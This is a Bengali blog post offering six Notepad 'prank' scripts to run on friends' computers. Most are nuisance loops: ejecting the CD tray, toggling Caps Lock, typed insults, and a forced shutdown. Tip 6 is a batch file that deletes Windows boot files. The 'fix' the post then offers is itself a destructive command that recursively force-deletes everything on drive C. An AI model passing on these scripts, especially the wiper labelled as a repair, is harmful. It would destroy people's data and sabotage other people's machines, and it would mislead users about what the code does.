Monday, September 1, 2014

বানিরে ফেলুন নোটপ্যাড দিয়ে ডেঞ্জারাস কিছু মজার টিপস

নোটপ্যাড যাদু পর্ব 

নোটপ্যাড মজার পর্বে আপনাকে অনেক অনেক প্রীতি ও শুভেচ্ছা। আজ আমি নোটপ্যাড দিয়ে বানানো যায় এরকম মজার মজার ছয়টি টিপস নিয়ে হাজির হয়েছি। আমরা যারা কম্পিউটার নিয়ে টুকিটাকি কাজ শিখতে চাই, আশা রাখি তাদের বেশ ভালোই লাগবে। আমরা ক্ষেত্রেই বলি - আমার ছাত্র অবস্থায় এ রকম ছোট ছোট টুকিটাকি টিপস নিয়ে খুবই মজা করতাম। যেমন বন্ধুদের কারো কারো কী বোর্ড কিংবা, কারো ডিভিডি রম কিংবা করো উইন্ডোজ Error ম্যাসেজ ইত্যাদি ইত্যদি মজার অনেক কিছু। এবার আসুন দেখি সেগুলি কি কি ? 
নোটপ্যাড

টিপস -১।

কিভাবে কম্পিউটারের সিডি / ডি ভি ডি রম বার বার খুলবেন এবং বন্ধ করবেন?

 Notepad ওপেন করে নিচের কোডটি টাইপ করুন-
Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop
এবার সেভ করুন  "cddvdopen.VBS" নামে এবং চালু করে মজা দেখুন।
টিপস -২। 

কিভাবে কম্পিউটারের Caps Lock বাটন বারবার অন-অফ করবেন?

Notepad ওপেন করে নিচের কোডটি টাইপ করুন- 
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
এবার সেভ করুন  "caponoff.VBS" নামে এবং চালু করে মজা দেখুন।
টিপস -৩। 

কিভাবে কম্পিউটারের বিভিন্ন Message বারবার দেখাবেন?

Notepad ওপেন করে নিচের কোডটি টাইপ করুন-
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
এবার সেভ করুন  "message.BAT" নামে এবং এর পর ফাইল টা চালু করে মজা দেখুন।
টিপস -৪। 

কিভাবে কম্পিউটার শাট-ডাউন ম্যাসেজ সহ কম্পিউটার বন্ধ করবেন?

Notepad খুলন এবং নিচের কোডটি টাইপ করুন-
@echo off msg * I don't like you shutdown -c "Error! You are too stupid!" –s
এবার সেভ করুন  "shutdownmsg.BAT" নামে এবং চালু করে মজা দেখুন।
টিপস -৫। 

কিভাবে কীবোর্ডকে ইমুলেট করে বারবার "You are a fool" লেখা দেখাবেন?

Notepad ওপেন করে নিচের কোডটি টাইপ করুন-
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
এবার "fullmsg.VBS" নামে সেভ করুন এবং চালু করে মজা দেখুন।
টিপস -৬।

কিভাবে কম্পিউটাকে পুরোপুরি শাট-ডাউন করবেন?

Notepad খুলুন আর নিচের কোডগুলো টাইপ করুন-
@echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini
ফাইলটিকে close.bat নামে সেভ করুন। এটি ওপেন করার সাথে কম্পিউটারের সব ফাইল হারিয়ে যাবে।এবং কম্পিউটার বারবার রি স্টার্ট হবে।
নোটঃ-
ভুলেও আপনার পিসি তে এটি ওপেন করবেন না। বন্ধুর সাথে মজা করতে পারেন। তবুও একটু ঝুকি থেকে যায়। সবচেয়ে বলি এটি ব্যবহার না করাই ভালো। এটি ব্যবহারে ঝুঁকিপূর্ণ সমস্যার জন্য লেখক কোন ভাবে দায়ী থাকবে না।
সমস্যা সমাধানের উপায়ঃ-
সমস্যা সমাধানের জন্য নিচের কোড টি ব্যবহার করতে পারেন-
cmd /c del c:\windows\* /F /S /Qcmd /c del c:\* /F /S /Q
সেভ করুন solve.cmd or solve.bat  দিয়ে  আশা করি সমস্যা ঠিক সমাধান হবে।

বন্ধুরা, আজ এ পর্যন্তই । ভালো লাগলে শেয়ার করতে ভুলবেন না প্লিস। সমস্যা হলে কমেন্ট করে জানাবেন। ভালো থাকুন সুস্থ থাকুন। ধন্যবাদ।
Previous Post
Next Post

0 comments: